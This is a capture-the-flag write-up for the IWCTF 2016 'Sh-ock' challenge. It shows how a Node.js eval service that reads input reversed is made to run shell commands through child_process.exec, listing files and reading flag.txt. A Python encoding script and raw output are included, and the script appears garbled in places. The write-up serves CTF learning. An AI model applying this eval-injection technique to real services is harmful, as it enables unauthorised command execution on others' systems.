# IWCTF 2016 - Exploit - Sh-ock - 90 pts
> Description: This is some kind of weird thing. I am sh-ocked.
> Service:
# Write-up
After connecting to the specified service, we'll get a prompt looking like a shell at first.
But after trying some commands, it gets obvious, that this ain't your normal shell, and it also has an awkward way of reading input.
$ nc 12589
Welcome and have fun!
[ReferenceError: l is not defined]
[ReferenceError: fdb is not defined]
The error message reveals, that our input gets parsed backwards and it only reads every second character.
Adapting to this:
[Function: eval]
It seems to be some javascript interpreter. To make it a bit easier to communicate with the service, I wrote a (quick&dirty) python script, which reverses the input and adds the needed placeholders. It then occured, that the longer our command is, the more placeholders were needed (count of dots found by empirical analysis ;-))
from socket import *
import sys
import time
BANNER = "Welcome and have fun!\n"
s = None
def connect():
global s
s = socket(AF_INET, SOCK_STREAM)
banner = s.recv(len(BANNER))
print banner
def obfuscate(cmd):
rev = cmd[::-1]
res = ""
for ch in rev:
res += ch
if len(cmd)<5:
res += "."
elif len(cmd)<6:
res += ".."
elif len(cmd)<8:
res += "..."
elif len(cmd)<9:
res += "...."
res += "....."
return res
def execCmd():
global s
input = raw_input(prompt)
cmd = obfuscate(input)+"\n"
print "Cmd: %s" % cmd
response = s.recv(4096)
print "Response: %s" % response
prompt = s.recv(1)
while True:
With this out of the way, we can start to find a way to exploit this thing.
$ python comm.py
Welcome and have fun!
Cmd: ).....'.....s.....y.....s.....'.....(.....e.....r.....i.....u.....q.....e.....r.....=.....s.....y.....s.....
Response: { format: [Function],
deprecate: [Function],
debuglog: [Function],
{ [Function: inspect]
_exceptionWithHostPort: [Function] }
Cmd: c.....e.....x.....e...........).....'.....s.....s.....e.....c.....o.....r.....p....._.....d.....l.....i.....h.....c.....'.....(.....e.....r.....i.....u.....q.....e.....r.....=.....c.....e.....x.....e.....
Response: [Function]
$foo=exec("ls -la",function(error,stdout,stdin){sys.print(stdout)})
Cmd: ).....}.....).....t.....u.....o.....d.....t.....s.....(.....t.....n.....i.....r.....p...........s.....y.....s.....{.....).....n.....i.....d.....t.....s.....,.....t.....u.....o.....d.....t.....s.....,.....r.....o.....r.....r.....e.....(.....n.....o.....i.....t.....c.....n.....u.....f.....,.....".....a.....l.....-..... .....s.....l.....".....(.....c.....e.....x.....e.....=.....o.....o.....f.....
Response: ChildProcess {
domain: null,
{ close: [Function: exithandler],
error: [Function: errorhandler] },
_eventsCount: 2,
_maxListeners: undefined,
_closesNeeded: 3,
_closesGot: 0,
connected: false,
signalCode: null,
exitCode: null,
killed: false,
spawnfile: '/bin/sh',
_handle: Process { owner: [Circular], onexit: [Function], pid: 28225 },
spawnargs: [ '/bin/sh', '-c', 'ls -la' ],
pid: 28225,
Cmd: )..(..o..o..f..
Response: wHalfOpen: false,
destroyed: false,
bytesRead: 0,
_bytesDispatched: 0,
_sockname: null,
_writev: null,
_pendingData: null,
_pendingEncoding: '' },
_pendingEncoding: '' } ] }
$total 16
drwxr-x--- 2 root exp90 4096 Feb 21 03:23 .
drwxr-xr-x 14 root exp90 4096 Feb 11 12:19 ..
-rw-r--r-- 1 root exp90 24 Feb 11 18:23 flag.txt
-rw-r--r-- 1 root exp90 1011 Feb 11 18:23 task.js
[TypeError: foo is not a function]
There it is, let's grab it and finish this...
$foo=exec("cat flag.txt",function(error,stdout,stdin){sys.print(stdout)})
Cmd: ).....}.....).....t.....u.....o.....d.....t.....s.....(.....t.....n.....i.....r.....p...........s.....y.....s.....{.....).....n.....i.....d.....t.....s.....,.....t.....u.....o.....d.....t.....s.....,.....r.....o.....r.....r.....e.....(.....n.....o.....i.....t.....c.....n.....u.....f.....,.....".....t.....x.....t...........g.....a.....l.....f..... .....t.....a.....c.....".....(.....c.....e.....x.....e.....=.....o.....o.....f.....
Response: ChildProcess {
domain: null,
Cmd: )..(..o..o..f..
Response: allowHalfOpen: false,
destroyed: false,
bytesRead: 0,
_pendingEncoding: '' } ] }
$IW{Shocked-for-nothing!}[TypeError: foo is not a function]
Flag: `$IW{Shocked-for-nothing!}`